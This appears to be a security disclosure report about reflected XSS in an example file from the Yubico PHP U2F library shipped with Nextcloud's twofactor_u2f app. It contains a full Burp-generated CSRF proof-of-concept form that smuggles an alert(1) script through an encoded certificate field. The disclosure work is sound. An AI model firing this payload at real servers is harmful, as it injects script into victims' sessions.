Reflected XSS in U2F plugin by shipping the example endpoints

While running a [RIPS scan](https://www.ripstech.com/) against our [instrumentalized source code](https://github.com/nextcloud/php-static-scanner-instrumentalization) it noticed that the file `/apps/twofactor_u2f/vendor/yubico/u2flib-server/examples/localstorage/index.php` echoes on user input: {F145451} I was first a tad confused because [the examples have been removed from our Git repository](https://github.com/nextcloud/twofactor_u2f/tree/3321e0dc84208adb623b6843f72e81782d9f2b6e/vendor/yubico/u2flib-server), but the release from apps.nextcloud.com ships with that file. So I suppose the Makefile is downloading the dependencies again. While exploiting this is not entirely trivial due to some sanity checks in the code above it is however possible, the following CSRF PoC will trigger a popup: ```html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://10.211.55.7/stable9/apps/twofactor_u2f/vendor/yubico/u2flib-server/examples/localstorage/index.php" method="POST"> <input type="hidden" name="doAuthenticate" value="&#123;&quot;signatureData&quot;&#58;&quot;AQAAABowRAIgMZL56nkLO7gs2OYoUW8RE3xAWLAvzroTiWO2T2PBb&#45;wCID6zjKjjxsqqG5NZ4upnT1xCeFmnDSefS&#95;TWHZWjoXgx&quot;&#44;&quot;clientData&quot;&#58;&quot;eyAiY2hhbGxlbmdlIjogIjFQX1l4TWpGVEhPcmNyQmlwUF8tLXRtVjA4SXNRUnVXaVlwZVZYVlNpVFUiLCAib3JpZ2luIjogImh0dHA6XC9cLzEwLjIxMS41NS43IiwgInR5cCI6ICJuYXZpZ2F0b3IuaWQuZ2V0QXNzZXJ0aW9uIiB9&quot;&#44;&quot;keyHandle&quot;&#58;&quot;9cgajEA4PWsnEbpgfnaxFBxMsiUNWo4GKbdk5PrdMn3c139bG3mXqLVw3VwpdcQzzPmVyGF6KBvFZsb2jpzdmg&quot;&#125;" /> <input type="hidden" name="request" value="&#91;&#123;&quot;version&quot;&#58;&quot;U2F&#95;V2&quot;&#44;&quot;challenge&quot;&#58;&quot;1P&#95;YxMjFTHOrcrBipP&#95;&#45;&#45;tmV08IsQRuWiYpeVXVSiTU&quot;&#44;&quot;keyHandle&quot;&#58;&quot;9cgajEA4PWsnEbpgfnaxFBxMsiUNWo4GKbdk5PrdMn3c139bG3mXqLVw3VwpdcQzzPmVyGF6KBvFZsb2jpzdmg&quot;&#44;&quot;appId&quot;&#58;&quot;http&#58;&#47;&#47;10&#46;211&#46;55&#46;7&quot;&#125;&#93;" /> <input type="hidden" name="registrations" value="&#91;&#123;&quot;keyHandle&quot;&#58;&quot;9cgajEA4PWsnEbpgfnaxFBxMsiUNWo4GKbdk5PrdMn3c139bG3mXqLVw3VwpdcQzzPmVyGF6KBvFZsb2jpzdmg&quot;&#44;&quot;publicKey&quot;&#58;&quot;BPtO8T0VluUL14FRKvEkZ5lP&#47;3W4F7er4WS87iYfrpoKj0Fjo&#43;M&#43;zAxNsuhYd&#43;3rYQFVPr4hflhOh3lMSZ605Fg&#61;&quot;&#44;&quot;certificate&quot;&#58;&quot;MIICLjCCARigAwIBAgIECmML&#92;&#47;zALBgkqhkiG9w0BAQswLjEsMCoGA1UEAxMjWXViaWNvIFUyRiBSb290IENBIFNlcmlhbCA0NTcyMDA2MzEwIBcNMTQwODAxMDAwMDAwWhgPMjA1MDA5MDQwMDAwMDBaMCkxJzAlBgNVBAMMHll1YmljbyBVMkYgRUUgU2VyaWFsIDE3NDI2MzI5NTBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABKQjZF26iyPtbNnl5IuTKs&#92;&#47;fRWTHVzHxz1IHRRBrSbqWD60PCqUJPe4zkIRFqBa4NnzdhVcS80nlZuY3ANQm0J&#43;jJjAkMCIGCSsGAQQBgsQKAgQVMS4zLjYuMS40LjEuNDE0ODIuMS4yMAsGCSqGSIb3DQEBCwOCAQEAZTmwMqHPxEjSB64Umwq2tGDKplAcEzrwmg6kgS8KPkJKXKSu9T1H6XBM9&#43;LAE9cN48oUirFFmDIlTbZRXU2Vm2qO9OdrSVFY&#43;qdbF9oti8CKAmPHuJZSW6ii7qNE59dHKUaP4lDYpnhRDqttWSUalh2LPDJQUpO9bsJPkgNZAhBUQMYZXL&#92;&#47;MQZLRYkX&#43;ld7llTNOX5u7n&#92;&#47;4Y5EMr&#43;lqOyVVC9lQ6JP6xoa9q6Zp9&#43;Y9ZmLCecrrcuH6&#43;pLDgAzPcc8qxhC2OR1B0ZSpI9RBgcT0KqnVE0tq1KEDeokPqF3MgmDRkJ&#43;&#43;&#92;&#47;a2pV0wAYfPC3tC57BtBdH&#92;&#47;UXEB8xZVFhtA&#61;&#61;wzh87&apos;&#45;alert&#40;1&#41;&#45;&apos;k50k8&quot;&#44;&quot;counter&quot;&#58;&#45;1&#125;&#93;" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` {F145453} This code is part of the [official Yubico PHP U2F library](https://github.com/Yubico/php-u2flib-server). In a first step I'll coordinate with @christophwurst to remove this file from the release on apps.nextcloud.com, then I'll make sure to reach out to Yubico to get this resolved in their library.